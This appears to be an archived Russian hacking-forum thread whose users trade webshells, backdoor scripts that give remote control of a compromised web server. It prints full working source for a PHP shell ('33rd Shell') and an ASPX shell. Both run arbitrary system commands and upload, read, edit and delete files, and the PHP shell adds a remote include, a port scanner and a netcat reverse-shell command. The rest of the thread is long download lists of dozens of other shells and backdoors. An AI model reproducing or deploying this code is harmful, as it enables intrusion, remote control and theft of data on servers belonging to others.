PDA

Просмотр полной версии : webshell scripts -)


blackybr
08.06.2006, 20:15
закинул на http://someshit.nm.ru/ 23 различных шэлла на питоне, перле, пхп
Мэйби у кого еще что есть, и кому не особо жалко - выкладывайте ) Интерестно сколько наберется...

Trinux
08.06.2006, 21:21
был еще на Asp, а вообще спасибо! Тема!

Isis
03.08.2007, 22:08
закинул на http://someshit.nm.ru/ 23 различных шэлла на питоне, перле, пхп
Мэйби у кого еще что есть, и кому не особо жалко - выкладывайте ) Интерестно сколько наберется...
Точнее http://someshit.nm.ru/br/ ;)

genom--
01.10.2007, 21:43
хз зачем собирать?? помойму каждому хватает 2-3 любимых и наиболее удобных для него

Fugitif
04.10.2007, 21:17
hey ppl look at this one :D loooool

New bypass shell for Linux servers. What you don't want to find lying around in your webroot.

quote from packetstorm


by erne (some turkish "hacker") :D

if someone wants to see it ...is here

http://www.packetstormsecurity.org/UNIX/penetration/rootkits/erne.txt

Isis
12.10.2007, 11:42
<?
// ################################################## ############################################
//
// .:. 33rd Shell .:.
// . . . by:gr33n . . .
//
// ################################################## ############################################
// Props to who ever made this, im sorry while editing i forgot who this belongs to, but job well done
// Thanks to milw0rm for ...well... no need to explain.
// Thanks to G0t-root for hosting informative services ;)
// Shouts to t3lnet, chatc, HL:1, retardwithaspork, fae, naturalp0rnkiller.
// edited by: gr33n (gr33n.org)
//-################################################## ############################################
// in this version you will find:
// remote port scanner ( scans a host from the server this script is on)
// remote source getter ( gets source of a web page from the host this script is on)
// server software ID ( returns the web-server software a remote server is running )
// and all the standard tools one might find in a php shell.
// ################################################## ############################################
//
// Default Changes (this is what you wanna change when u edit this file)
//
// ################################################## ############################################

$owner = "some hacker."; // Insert your nick
$version = ".33.1 PUBLIC "; // The version

// ################################################## ############################################

?>

<style type="text/css">
<!--
body {
background-color: #000000;
background-repeat: repeat;
}
body,td,th {
color: #009900;
}
a:link {
color: #00FF00;
}
a:visited {
color: #009900;
}
-->
</style><body alink="#000000">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<p><font face="Webdings" size="6">Ò</font> <font size="8"> 33rd Shell</font><font face="Webdings" size="6">Ò</font></p>
<p><font face='Verdana' style='font-size: 8pt'><?php echo "Shell By: $owner"; ?></font></p>
</div><b><u></u></b>
<hr color="#000000" size="2,5">

<div align="center">
<center>
<p>
<?php
// Get Dir Var
$dir = $_GET["d"];
if(!isset($dir)) {
$dir = "./";
}

// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
} else {
print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
}

?>
<font face="Webdings" size="6">Í</font></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003399">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo __FILE__ ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?></font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#003399" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#003399" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt"> </font><br>
<input type="submit" value="Upload File!"> <br>
</p>
</form>
<?php

function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";

if( file_exists($filename))
{
check_file();
}
}

if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}

else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?></td>

</tr>
<tr>
<td style="overflow:auto" width="49%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Directories ]</font></td>
<td width="51%" height="19" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ File Viewer ]</font></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center">
<div align="center" style="overflow:auto; width:99%; height:175">
<?
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if ((filetype($dir . $file)) == "dir") {
echo "<b><a href='".$_SERVER["PHP_SELF"]."?d=".$dir.$file."/'>".$file."</a></b><br />\n";
} else {
echo "<a href='".$_SERVER["PHP_SELF"]."?r=".$dir.$file."&d=".$dir."'>".$file."</a><br />\n";
}
}
closedir($dh);
}
}
?>
</div>
<p align="center"></td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<form name="frm">
<p align="center"><textarea name="filvw" rows="13" cols="55"><?
@$read = $_GET["r"];
if(isset($read)) {
@$handle = fopen($read, "r");
@$contents = fread($handle, filesize($read));
@fclose($handle);
if ($contents == "") {
echo "No file loaded...";
exit();
}
echo htmlentities($contents);
}
?></textarea><br>
<br>
<input type="button" onClick="document.frm.filvw.rows='30';" name="resize" style="width: 34; height: 26" value="+">
<input type="button" onClick="document.frm.filvw.rows='13';" name="normalize" style="width: 34; height: 26" value="-"><br>
</p>
</form>
</p>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
<td width="51%" height="19" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center"><?
$scriptname = $_SERVER['SCRIPT_NAME'];
$filename = $_POST["filename"];

if($_POST["submit"] == "Open")
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));

if(!$filecontents)
$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Delete")
{
if(file_exists($filename))
{
if(unlink($filename))
$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
else
$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Save")
{
$filecontents = stripslashes(html_entity_decode($_POST["contents"]));

if(file_exists($filename))
unlink($filename);

$handle = fopen($filename, "w");

if(!$handle)
$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
else
{
if(!fwrite($handle, $filecontents))
$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";

fclose($handle);
}

$filecontents = htmlentities($filecontents);
}
else
{
$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
}
?>
<table border="0" align="center">

<tr>
<td>
<table width="100%" border="0">
<tr>
<td>
<form method="post" action="<?echo $scriptname;?>">
<input name="filename" type="text" value="<?echo $filename;?>" size="20">
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Delete">
</td>
</tr>
</table>
</td>
</tr>

<tr>
<td>
<font face="Verdana" style="font-size: 11pt">
<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
<input type="submit" name="submit" value="Save">
<input type="reset" value="Reset">
</form>
</td>
</tr>

<tr>
<td>
<h2><?echo $status;?></h2>
</td>
</tr>
</table>
<p> </p></td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<textarea rows="13" cols="55"></textarea><br>
</font><?php @$output = include($_POST['incl']); ?></td>
</tr>
</table>
<table width="100%" height="25" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Port Scanner]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center"><strong>Scan a Host From This Server </strong>
<center>
<form method="POST">
Host:<input type="text" name="host"><br />
Port:<input type="text" name="sport"><br />
End Port:<input type="text" name="eport"><br />
<input type="submit" name="start" value="Start">
</form>
</center>
<p>
<?php
if (isset($_POST['start'])) {
$host = $_POST['host'];
$port = $_POST['sport'];
$eport = $_POST['eport'];
while ($port <= $eport) {
$check = fsockopen($host, $port);
if ($check) {
echo $host . " is up on port: " . $port;
$port++;
}
else {
echo $host . " is not up on port: " . $port;
$port++;
}
}
}
else { }
?>
</p>
</tr>
</table>
</center>
</div>
<table width="100%" height="150" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Server Software ID ]</font></td>
</tr>
<tr>
<td width="49%" height="123"><p align="center"><strong>Remote Server ID </strong>

</head>
<center>
<form method="POST">
Host:<input type="text" name="host" datafld="text" value="Google.com" size="24"><br />
<input type="submit" name="start" value="Start"></form>
</center>
<?php
function get_server_software($domain) {
$fp = fsockopen($domain , 80, $errno, $errstr, 1);

if (!$fp) {
return("");
}

else {
fputs($fp, "HEAD / HTTP/1.1\r\nHost: " . $domain . "\r\n\r\n");



while (!feof($fp)) {
if (preg_match("/\bServer:/", $server = fgets($fp, 256))) {
fclose($fp);
return(substr($server, 8, -2));
}
}

fclose($fp);
}
}

echo "Host is running : " , get_server_software($host);

php?>


</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003366"><p align="center"><font face="Verdana" size="2">[ Source Get ]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center"><strong>Source Of A Remote Website. </strong>
<center>
<FORM>
<INPUT TYPE=HIDDEN NAME=action VALUE="query">
<font face="verdana,arial" size="1"><b>
Server:<br><INPUT TYPE="text" NAME=server SIZE="40" VALUE="<?echo $server?>">(no http://)<br>
Specific file:<br><INPUT TYPE="text" NAME="file" SIZE="40">(ie. index.html) <br>
<INPUT TYPE=SUBMIT VALUE=" View Source! ">
</FORM>
</center>
<?php
function get_source($server, $file = "")
{
$data = "";
$query = "GET /$file HTTP/1.0";
$fp = fsockopen($server, 80);
if($fp)
{
fputs($fp, $query."\n\n");
while(!feof($fp))
{
$data .= fread($fp, 1000);
}
fclose($fp);
}
return $data;
}
?>

<?php
if($action=="query")
{
$data = get_source($server, $file);
echo "<font face=\"tahoma\" size=\"2\"></b>Connected To <b>$server</b> on port 80.<br>";
echo "Source of <b>$file</b>: <p><pre><textarea cols=75 rows=25 wrap=\"virtual\">$data</textarea></p></pre>";
}
?>




</tr>
</table>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#003366">
<p align="center"><font face="Verdana" size="2">[ Remove Shell ]</font></td>
</tr>
<tr>
<td width="49%" height="142"><p align="center">

<form method="POST">
<p align="center"><font face="Verdana"><font size="2"><b>Type "remove"
to remove the 33rd Shell </b><br>
<br><input name="rm" type="text" size="20"><br>
<br>
</font><input type="submit" value="Remove Me"></font></p>
</form> <? if ($_POST['rm'] == "remove") { unlink(__FILE__); echo "<script>alert('Rootshell by:gr33n);self.location.href='http://gr33n.org';</script>"; } ?> </tr>
</table>
</p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#000000" height="20">
<p align="center"><font face="Verdana" size="2">= 33rd Shell v<?php echo "$version" ?> ©reated 8/10/2007 by: gr33n.org </font> =</td>
</tr>
</table>
</center>
</div>

ValdikSS
15.10.2007, 16:55
можете перезалить?

Fugitif
16.10.2007, 00:57
Root@Shell 1.0

this shell can be already old for someone as can be also new for others :)

however is here:

http://img506.imageshack.us/img506/8928/rootshellvd7.png

http://img287.imageshack.us/img287/3453/rootshell2uw7.png


DOWNLOAD:


http://rapidshare.com/files/62804028/rootshell.rar.html

Fugitif
14.11.2007, 00:04
Basic ASP.NET shell that, once uploaded to a server, can be used to execute shell commands and upload, download, and delete files.


the shit :)


<%-- ASPX Shell by LT <lt@mac.hush.com> (2007) --%>
<%@ Page Language="C#" EnableViewState="false" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>

<%
string outstr = "";

// get pwd
string dir = Page.MapPath(".") + "/";
if (Request.QueryString["fdir"] != null)
dir = Request.QueryString["fdir"] + "/";
dir = dir.Replace("\\", "/");
dir = dir.Replace("//", "/");

// build nav for path literal
string[] dirparts = dir.Split('/');
string linkwalk = "";
foreach (string curpart in dirparts)
{
if (curpart.Length == 0)
continue;
linkwalk += curpart + "/";
outstr += string.Format("<a href='?fdir={0}'>{1}/</a>&nbsp;",
HttpUtility.UrlEncode(linkwalk),
HttpUtility.HtmlEncode(curpart));
}
lblPath.Text = outstr;

// create drive list
outstr = "";
foreach(DriveInfo curdrive in DriveInfo.GetDrives())
{
if (!curdrive.IsReady)
continue;
string driveRoot = curdrive.RootDirectory.Name.Replace("\\", "");
outstr += string.Format("<a href='?fdir={0}'>{1}</a>&nbsp;",
HttpUtility.UrlEncode(driveRoot),
HttpUtility.HtmlEncode(driveRoot));
}
lblDrives.Text = outstr;

// send file ?
if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0))
{
Response.ClearContent();
Response.WriteFile(Request.QueryString["get"]);
Response.End();
}

// delete file ?
if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0))
File.Delete(Request.QueryString["del"]);

// receive files ?
if(flUp.HasFile)
{
string fileName = flUp.FileName;
int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
if (splitAt >= 0)
fileName = flUp.FileName.Substring(splitAt);
flUp.SaveAs(dir + "/" + fileName);
}

// enum directory and generate listing in the right pane
DirectoryInfo di = new DirectoryInfo(dir);
outstr = "";
foreach (DirectoryInfo curdir in di.GetDirectories())
{
string fstr = string.Format("<a href='?fdir={0}'>{1}</a>",
HttpUtility.UrlEncode(dir + "/" + curdir.Name),
HttpUtility.HtmlEncode(curdir.Name));
outstr += string.Format("<tr><td>{0}</td><td>&lt;DIR&gt;</td><td></td></tr>", fstr);
}
foreach (FileInfo curfile in di.GetFiles())
{
string fstr = string.Format("<a href='?get={0}' target='_blank'>{1}</a>",
HttpUtility.UrlEncode(dir + "/" + curfile.Name),
HttpUtility.HtmlEncode(curfile.Name));
string astr = string.Format("<a href='?fdir={0}&del={1}'>Del</a>",
HttpUtility.UrlEncode(dir),
HttpUtility.UrlEncode(dir + "/" + curfile.Name));
outstr += string.Format("<tr><td>{0}</td><td>{1:d}</td><td>{2}</td></tr>", fstr, curfile.Length / 1024, astr);
}
lblDirOut.Text = outstr;

// exec cmd ?
if (txtCmdIn.Text.Length > 0)
{
Process p = new Process();
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.WorkingDirectory = dir;
p.Start();

lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
txtCmdIn.Text = "";
}
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>ASPX Shell</title>
<style type="text/css">
* { font-family: Arial; font-size: 12px; }
body { margin: 0px; }
pre { font-family: Courier New; background-color: #CCCCCC; }
h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; }
h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
th { text-align: left; background-color: #99CC99; }
td { background-color: #CCFFCC; }
pre { margin: 2px; }
</style>
</head>
<body>
<h1>ASPX Shell by LT</h1>
<form id="form1" runat="server">
<table style="width: 100%; border-width: 0px; padding: 5px;">
<tr>
<td style="width: 50%; vertical-align: top;">
<h2>Shell</h2>
<asp:TextBox runat="server" ID="txtCmdIn" Width="300" />
<asp:Button runat="server" ID="cmdExec" Text="Execute" />
<pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre>
</td>
<td style="width: 50%; vertical-align: top;">
<h2>File Browser</h2>
<p>
Drives:<br />
<asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" />
</p>
<p>
Working directory:<br />
<b><asp:Literal runat="server" ID="lblPath" Mode="passThrough" /></b>
</p>
<table style="width: 100%">
<tr>
<th>Name</th>
<th>Size KB</th>
<th style="width: 50px">Actions</th>
</tr>
<asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" />
</table>
<p>Upload to this directory:<br />
<asp:FileUpload runat="server" ID="flUp" />
<asp:Button runat="server" ID="cmdUpload" Text="Upload" />
</p>
</td>
</tr>
</table>

</form>
</body>
</html>

Isis
14.01.2008, 03:56
# ErNe Safe Mode byPass (http://www.r57.li/erne.txt)
# SafeOver byPass Shell (http://www.r57.li/safeover.txt)
# Heykir Shell (http://www.r57.li/heykir.txt)
# Ajax Command Shell (http://www.r57.li/ajaxcommandshell.rar)
# Anti Chat Shell (http://www.r57.li/antichatshell.rar)
# c100 (http://www.r57.li/c100.txt)
# Cmd Asp (http://www.r57.li/cmd.asp.txt)
# Crystal (http://www.r57.li/crystal.txt)
# Dive Shell (http://www.r57.li/diveshel.txt)
# D Tool Pro (http://www.r57.li/dtoolpro.txt)
# Efso2 Asp (http://www.r57.li/efso2.asp.txt)
# Elmali Seker Asp (http://www.r57.li/elmaliseker.asp.txt)
# Fatal Shell (http://www.r57.li/fatalshell.rar)
# HackerOnur Shell (http://www.r57.li/hackeronurshell.rar)
# Hantu Shell (http://www.r57.li/hantushell.rar)
# IncludeW Shell (http://www.r57.li/includewshell.rar)
# Indexper Asp (http://www.r57.li/inderexperasp.txt)
# Iron Shell (http://www.r57.li/ironshell.rar)
# Kau Shell (http://www.r57.li/kaushell.rar)
# Klasvayv Asp (http://www.r57.li/klasvayv.asp.txt)
# Lama Shell (http://www.r57.li/lamashell.rar)
# Liz0zim Shell (http://www.r57.li/lizozim.txt)
# Load Shell (http://www.r57.li/loadshell.rar)
# My Shell (http://www.r57.li/myshell.rar)
# Mysql Shell (http://www.r57.li/mysqlshell.rar)
# Nc Shell (http://www.r57.li/ncshell.rar)
# PHP Incektion Shell (http://www.r57.li/phpinjectionshell.rar)
# PhpRemote View Shell (http://www.r57.li/phpremoteview.txt)
# Php Shell (http://www.r57.li/phpshell.rar)
# Phvayv Shell (http://www.r57.li/phvayv.txt)
# R57 Ifx Shell (http://www.r57.li/r57ifx.txt)
# Rader Asp (http://www.r57.li/rader.asp.txt)
# Remotexp Asp (http://www.r57.li/remotexp.asp.txt)
# Root Shell (http://www.r57.li/rootshell.rar)
# Ru24 Post Shell (http://www.r57.li/ru24postshell.rar)
# s72 Shell (http://www.r57.li/s72.txt)[/FONT]
# Safemode Shell1 (http://www.r57.li/safemodeshell1.txt)
# Sim Attacker (http://www.r57.li/simattacker.txt)
# Simple BackDoor (http://www.r57.li/simplebackdoor.txt)
# Simple Cmd (http://www.r57.li/simplecmd.txt)
# Sim Shell (http://www.r57.li/simshell.txt)
# Sincap Shell (http://www.r57.li/sincapshell.rar)
# Sniper (http://www.r57.li/sniper.txt)
# Telnet Cgi (http://www.r57.li/telnet.rar)
# Telnet Pl (http://www.r57.li/telnetpl.rar)
# Tool Asp (http://www.r57.li/tool.asp.txt)
# W Shell (http://www.r57.li/w.txt)
# W4k (http://www.r57.li/w4k.txt)
# WebShell Cgi (http://www.r57.li/webshell.rar)
# Winx Shell (http://www.r57.li/winxshell.rar)
# Worse Linux Shell (http://www.r57.li/worselinuxshell.rar)
# Xinfo (http://www.r57.li/xinfo.txt)
# ZacosMall (http://www.r57.li/zacosmall.txt)
# Zehir4 Asp (http://www.r57.li/zehir4.asp.txt)

WuWu
16.01.2008, 00:15
какой шелл нужен для просмотра таблиц бд?

iddqd
16.01.2008, 00:32
r57 sql shell

Isis
25.01.2008, 03:36
PHP Spy 2008


http://i16.tinypic.com/6srdqmg.png
http://i3.tinypic.com/6yfq8mr.png


Download: http://www.4ngel.net/project/phpspy_2008.rar

Isis
25.01.2008, 04:05
TDshell by TheDefaced

* A powerful core
o Central OOP based core that contains many elements
+ Central link creation engine
# ...based upon arguments that ensue the action of the shell, a central encoded argument system, and formatting controllers that use the internal template engine to format the link.
+ Template engine
# ...that uses predefined information to attribute toward the execution of the shell
+ Output Control Functions
* The processing within the core
o directory manager
+ Displays the contents of a directory
+ sorts by links, dirs, and files
+ dissassembles the path and allows directory scanning of parent directories
+ the editing, viewing, and management of files
+ quick MD5 checksums of files and expandable checksum columns for each file
+ size, user, group, modification, etc. information instantly
+ scrollover file information including size
+ file editing, viewing, deleting, downloading
+ file information such as access times and other information
+ creation and quick editing / viewing of files
+ moving files and copying them
+ moving directories (renaming), directory information and quick browsing
+ file permission and directory permission management (that actually works)
o PHP evaluation, command line execution, and process management

http://tdshell.thedefaced.org/download.html

Netmen
19.05.2008, 19:18
locus7s перезалейте пожалуйста

zer0ska
19.05.2008, 20:45
Зачем столько ?
ИМХО из множества шелов есть всего пара настояших релизов все осталное балавство.

Fugitif
26.05.2008, 00:46
Vbulletin Shell V2


Screen:

http://img366.imageshack.us/img366/4034/vbshell3un0.jpg
http://img505.imageshack.us/img505/5171/vbshell1ta0.jpg
http://img440.imageshack.us/img440/8590/vbshell2mn6.jpg

Download:

http://rapidshare.com/files/117596048/VB-SHELL.rar.html

Feeble
29.05.2008, 08:36
hidden's shell v1 (http://mentat.sibintercom.ru/Nemo/shell/hidshell.txt) -8kb
Какой пароль к шелу?

Coderok
06.07.2009, 16:54
*php:
C99Shell v. 1.0 beta (5.02.2005) (http://mentat.sibintercom.ru/Nemo/shell/c99shell.txt) -140kb
Cyber Shell (http://mentat.sibintercom.ru/Nemo/shell/cybershell.txt) -35kb
GFS Web-Shell (http://mentat.sibintercom.ru/Nemo/shell/gfs_sh.txt) -65kb
NFM 1.8 (http://mentat.sibintercom.ru/Nemo/shell/nfm.txt) -123kb
r57shell (http://mentat.sibintercom.ru/Nemo/shell/review.txt) -102kb
Small Web Shell by ZaCo (http://mentat.sibintercom.ru/Nemo/shell/zacosmall.txt) -16kb
nsTView v2.1 (http://mentat.sibintercom.ru/Nemo/shell/nst.txt) -82kb
DxShell v1.0 (http://mentat.sibintercom.ru/Nemo/shell/DxShell.txt) -111kb
C99madShell v. 2.0 madnet edition (http://mentat.sibintercom.ru/Nemo/shell/c99edit.txt) -44kb
CTT Shell (http://mentat.sibintercom.ru/Nemo/shell/ctt_sh.txt) -130kb
GRP WebShell 2.0 release build 2018 (C)2006,Great (http://mentat.sibintercom.ru/Nemo/shell/grp-2018.txt) -17kb
Crystal shell (http://mentat.sibintercom.ru/Nemo/shell/Crystal.txt) -56kb
Loader'z WEB Shell (http://mentat.sibintercom.ru/Nemo/shell/load_shell.txt) -14kb
NIX REMOTE WEB SHELL (http://mentat.sibintercom.ru/Nemo/shell/nixrem.txt) -68kb
Antichat Shell (http://mentat.sibintercom.ru/Nemo/shell/antichat.txt) -13kb
CasuS 1.5 (http://mentat.sibintercom.ru/Nemo/shell/casus15.txt) -14kb
Sincap 1.0 (http://mentat.sibintercom.ru/Nemo/shell/phvayv.txt) -4kb
C99Shell v. 1.0 pre-release build(safe-mode) (http://mentat.sibintercom.ru/Nemo/shell/c99-safe-mode.txt) -159kb
hidden's shell v1 (http://mentat.sibintercom.ru/Nemo/shell/hidshell.txt) -8kb
Web-shell (c)ShAnKaR (http://mentat.sibintercom.ru/Nemo/shell/sh.txt) 26-kb
Predator (http://mentat.sibintercom.ru/Nemo/shell/predator.txt) -40kb
KA_uShell 0.1.6 (http://mentat.sibintercom.ru/Nemo/shell/KA_uShell.php.txt) -5kb
NGH (http://mentat.sibintercom.ru/Nemo/shell/ngh.txt) -18kb
C2007Shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r (http://mentat.sibintercom.ru/Nemo/shell/c2007.txt) -164kb
Antichat Shell. Modified by Go0o$E (http://mentat.sibintercom.ru/Nemo/shell/a_gedit.txt) -31kb
Rootshell v3.0.0 © 2006 by SR-Crew (http://mentat.sibintercom.ru/Nemo/shell/r0t) -15kb
c0derz shell [csh] v. 0.1.1 release (http://mentat.sibintercom.ru/Nemo/shell/csh.txt) -13kb
iMHaBiRLiGi Php FTP (http://mentat.sibintercom.ru/Nemo/shell/iMHaPFtp.txt) -53kb
PHVayv (http://mentat.sibintercom.ru/Nemo/shell/phvayvv.txt) -25kb
phpRemoteView (http://mentat.sibintercom.ru/Nemo/shell/remview.txt) -90kb
STNC WebShell v0.8 (http://mentat.sibintercom.ru/Nemo/shell/STNC.txt) -7kb
MyShell (http://mentat.sibintercom.ru/Nemo/shell/myshell.txt) -11kb
ZyklonShell (http://mentat.sibintercom.ru/Nemo/shell/zyklonshell.txt) -6kb
AK-74 Security Team Web Shell Beta Version (http://mentat.sibintercom.ru/Nemo/shell/ak74shell.txt) -20kb
php backdoor | coded by z0mbie (http://mentat.sibintercom.ru/Nemo/shell/gfs_sh.txt) -3kb
PHP Backdoor Version 1.5 | LOTFREE TEAM (http://mentat.sibintercom.ru/Nemo/shell/LOTFREE.php.txt)

*perl/cgi
Perl Web Shell by RST/GHC (http://mentat.sibintercom.ru/Nemo/shell/r57pws.pl.txt) -20kb
CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server. By Rohitab Batra (http://mentat.sibintercom.ru/Nemo/shell/telnet.cgi.txt) -27kb
Network security team :: CGI Shell. By Ins (http://mentat.sibintercom.ru/Nemo/shell/lurm_safemod_on.cgi.txt) -3kb
Gamma Web Shell (http://mentat.sibintercom.ru/Nemo/shell/WebShell.cgi.txt) -25kb
go-shell (http://mentat.sibintercom.ru/Nemo/shell/go-shell.cgi.txt) -3kb
PhpSpy Ver 2006 (http://mentat.sibintercom.ru/Nemo/shell/phpspy.php.txt) -48kb
webadmin.php (http://mentat.sibintercom.ru/Nemo/shell/webadmin.php.txt) -67kb

*python
go-shell (http://mentat.sibintercom.ru/Nemo/shell/wh_bindshell.py) -25kb

*.asp
CmdAsp.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/CmdAsp.asp.txt) -2kb
CyberSpy5.Asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/CyberSpy5.Asp.txt) -82kb
klasvayv.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/klasvayv.asp.txt) -34kb
indexer.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/indexer.asp.txt) -11kb
NTDaddy v1.9 (http://mentat.sibintercom.ru/Nemo/shell/asp/ntdaddy.asp.txt) -39kb
reader.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/reader.asp.txt) -10kb
RemExp.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/RemExp.asp.txt) -8kb
zehir4.asp.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/zehir4.asp.txt) -51kb
Elmaliseker.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/elmaliseker.asp.txt) -65kb
EFSO_2.txt (http://mentat.sibintercom.ru/Nemo/shell/asp/EFSO_2.asp.txt) -160kb
ASP Cmd Shell On IIS 5.1 (http://mentat.sibintercom.ru/Nemo/shell/cmd-asp-5.1.asp.txt) -2kb

jsp:
KJ021320 JSP Manage-System 1.0 (http://mentat.sibintercom.ru/Nemo/shell/jspshall.jsp.txt) -36kb
JSP Backdoor Reverse Shell (http://mentat.sibintercom.ru/Nemo/shell/jsp-reverse.jsp.txt) -3kb
cmdjsp.jsp (http://mentat.sibintercom.ru/Nemo/shell/cmdjsp.jsp.txt) -1kb

Other, 68

accept_language.rar
Ajax_PHP Command Shell.rar
Antichat Shell v1.3.rar
Ayyildiz Tim -AYT- Shell v 2.1 Biz.rar
aZRaiLPhp v1.0.rar
backupsql.rar
c99.rar
c99_locus7s.rar
